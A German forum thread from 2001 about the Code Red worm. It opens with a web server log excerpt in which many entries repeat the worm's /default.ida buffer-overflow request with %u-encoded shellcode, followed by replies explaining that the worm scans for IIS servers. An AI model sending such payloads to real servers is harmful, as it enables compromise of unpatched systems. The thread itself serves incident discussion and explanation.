Anzeige:
Ergebnis 1 bis 13 von 13

Thema: Code Red lässt grüssen ---- Ganz schön was los!

  1. 06.08.01, 15:32 #1
    netzmeister
    netzmeister ist offline
    Kommunikator
    Registriert seit
    Apr 1999
    Ort
    Reutlingen
    Beiträge
    3.673

    Exclamation Code Red lässt grüssen ---- Ganz schön was los!

    Hier ein Auszug aus einem Logfile:

    -------------------------
    www.tirs.cz - - [05/Aug/2001:15:00:14 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    212.184.72.8 - - [05/Aug/2001:15:08:11 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.tirs.cz - - [05/Aug/2001:15:15:39 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    pd90541d0.dip.t-dialin.net - - [05/Aug/2001:15:16:59 +0200] "-" 408 - "-" "-"
    pd90541d0.dip.t-dialin.net - - [05/Aug/2001:15:17:00 +0200] "-" 408 - "-" "-"
    212.224.137.162 - - [05/Aug/2001:15:20:10 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    cm61-18-7-132.hkcable.com.hk - - [05/Aug/2001:15:28:11 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 400 252 "-" "-"
    pd4b9f032.dip.t-dialin.net - - [05/Aug/2001:15:36:34 +0200] "GET / HTTP/1.1" 200 1 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
    212.71.101.33 - - [05/Aug/2001:15:44:23 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    chello212186059084.12.vie.surfer.at - - [05/Aug/2001:15:45:06 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    212.99.133.177 - - [05/Aug/2001:15:54:20 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    srv-ze-robot1.tricus.com - - [05/Aug/2001:15:58:00 +0200] "GET /robots.txt HTTP/1.0" 404 204 "-" "AbachoBOT"
    srv-ze-robot1.tricus.com - - [05/Aug/2001:15:58:00 +0200] "GET /inte/inter.htm HTTP/1.0" 404 208 "-" "AbachoBOT"
    212.234.66.100 - - [05/Aug/2001:15:59:40 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    212.68.198.216.brutele.be - - [05/Aug/2001:16:09:13 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    tnt-14-150.easynet.co.uk - - [05/Aug/2001:16:11:45 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    ezspider402.directhit.com - - [05/Aug/2001:16:23:35 +0200] "HEAD / HTTP/1.0" 200 0 "-" "Mozilla/2.0 (compatible; Ask Jeeves)"
    ezspider402.directhit.com - - [05/Aug/2001:16:23:36 +0200] "GET / HTTP/1.0" 200 1 "-" "Mozilla/2.0 (compatible; Ask Jeeves)"
    pd9568b07.dip.t-dialin.net - - [05/Aug/2001:16:29:37 +0200] "GET /uebe/webprov.htm HTTP/1.1" 404 222 "http://search.msn.de/results.asp?cfg=SMCINITIAL&srch=5&FORM=AS5&RS=CHEC KED&v=1&q=cuseemee" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" www.edu.nsu.ru - - [05/Aug/2001:16:30:15 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:16:31:50 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    cache-fra-aa05.proxy.aol.com - - [05/Aug/2001:16:46:11 +0200] "GET / HTTP/1.0" 200 1 "-" "Mozilla/4.0 (compatible; MSIE 5.5; AOL 5.0; Windows 98; DT)"
    stgt-3e362069.pool.mediaways.net - - [05/Aug/2001:16:56:39 +0200] "GET / HTTP/1.1" 200 1 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
    dialin-port8756.access.nacamar.de - - [05/Aug/2001:16:59:51 +0200] "GET / HTTP/1.1" 200 1 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
    soundundvision.net - - [05/Aug/2001:17:05:50 +0200] "HEAD / HTTP/1.0" 200 0 "-" "LWP::Simple/5.10"
    soundundvision.net - - [05/Aug/2001:17:05:51 +0200] "GET / HTTP/1.0" 200 1 "-" "LWP::Simple/5.10"
    soundundvision.net - - [05/Aug/2001:17:06:08 +0200] "HEAD / HTTP/1.0" 200 0 "-" "LWP::Simple/5.10"
    soundundvision.net - - [05/Aug/2001:17:06:09 +0200] "GET / HTTP/1.0" 200 1 "-" "LWP::Simple/5.10"
    subs.mun.yahoo.com - - [05/Aug/2001:17:08:46 +0200] "GET / HTTP/1.0" 200 1 "-" "Mozilla/4.05"
    212.27.113.99 - - [05/Aug/2001:17:12:29 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    j100.inktomi.com - - [05/Aug/2001:17:13:06 +0200] "GET /robots.txt HTTP/1.0" 404 204 "-" "Slurp/si (slurp@inktomi.com; <A HREF="http://www.inktomi.com/slurp.html)"" TARGET=_blank>http://www.inktomi.com/slurp.html)"</A>
    212.71.98.35 - - [05/Aug/2001:17:13:09 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    j100.inktomi.com - - [05/Aug/2001:17:13:09 +0200] "GET / HTTP/1.0" 200 1 "-" "Slurp/si (slurp@inktomi.com; <A HREF="http://www.inktomi.com/slurp.html)"" TARGET=_blank>http://www.inktomi.com/slurp.html)"</A>
    chello212017084052.12.vie.surfer.at - - [05/Aug/2001:17:13:56 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    p3ee0758b.dip.t-dialin.net - - [05/Aug/2001:17:28:38 +0200] "GET / HTTP/1.1" 200 1 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; T-Online Internatinal AG)"
    212.71.150.10 - - [05/Aug/2001:17:28:40 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:37:39 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:37:43 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:37:47 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:37:48 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:37:48 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:39:01 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:39:01 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:39:37 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:39:37 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:39:37 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:39:52 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-" www.edu.nsu.ru - - [05/Aug/2001:17:40:01 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    212.251.120.124 - - [05/Aug/2001:17:41:37 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
    -----------------------------------------

    Grüsse

    Eicke
    Zitieren Zitieren
  2. 06.08.01, 15:38 #2
    blackbird
    blackbird ist offline
    Registrierter Benutzer
    Registriert seit
    Jan 2000
    Ort
    München
    Beiträge
    784

    Post

    Zitieren Zitieren
  3. 06.08.01, 16:13 #3
    Alex_K
    Alex_K ist offline
    Registrierter Benutzer
    Registriert seit
    Jul 2000
    Ort
    Österreich
    Beiträge
    1.866

    Post

    was macht dieser code red eigentlich?
    Zitieren Zitieren
  4. 06.08.01, 16:36 #4
    Ulli Ivens
    Ulli Ivens ist offline
    Registrierter Benutzer Avatar von Ulli Ivens
    Registriert seit
    Jan 2001
    Ort
    Heinsberg im Rheinland, Deutschland
    Beiträge
    1.844
    Ulli Ivens eine Nachricht über ICQ schicken

    Question

    Aehm, moment mal .....

    Ihr habt doch sicherlich nen Linux - Server ---- ich denke das Ding befällt nur NT und 2000 ??? Oder ist das Teil soooo doof das es auch versucht Linux Rechner zu befallen ??? Und was sind (also was bedeuten) die Auszüge ??

    Entschuldigt meine Unwissenheit !!

    [ 06. August 2001: Beitrag editiert von: Ulli Ivens ]
    Gruß Ulli

    ---------
    Notebook: MacBookPro | Late 2012, 16 GB RAM | Software: Mac OS X 10.8.2 | Parallels mit Ubuntu 12.4 mit XFCE und Windows 8 | NetAachen DSL 6000, FritzBox Fon 7270 | mehrere DD-WRT AP's
    Zitieren Zitieren
  5. 06.08.01, 20:28 #5
    christophwth
    christophwth ist offline
    Registrierter Benutzer
    Registriert seit
    Oct 1999
    Ort
    Kiel
    Beiträge
    1.798

    Post

    Hi

    auch bei mir im logfile tauchen ähliche einträge auf.

    richtig ist code red kann nur microssoft
    dienste befallen.
    aber um solche zu finden werden systematisch und zufällig alle möglichen
    ip's gescannt in der hoffnung einen IIS zu finden dabei werden natürlich auch pakete an linux server geschickt aber im normalfall von der firewall gefiltert.

    sollte bei dir ein port 80 offen sein
    dann antwortet dein rechner . aber meines wissens gibt keine linux mutationen des virus

    gruss
    christoph
    Zitieren Zitieren
  6. 06.08.01, 20:35 #6
    netzmeister
    netzmeister ist offline
    Kommunikator
    Registriert seit
    Apr 1999
    Ort
    Reutlingen
    Beiträge
    3.673

    Lightbulb

    Hallo,

    das obige Logfile stammt von einem WIN2000 Server.

    Die Server werden vom Virus praktisch durchprobiert, um herauszufinden ob auf dem jeweiligen System der zu knackende Indexserver läuft.

    Dort nestet sich dann den Virus ein und startet weitere Attacken gegen andere Rechner.

    Port 80 per Firewall sperren, bei einem Webserver keine so gute Idee.

    Natürlich läuft das Forum auf einem Linuxserver.

    Grüsse

    Eicke
    Zitieren Zitieren
  7. 07.08.01, 01:02 #7
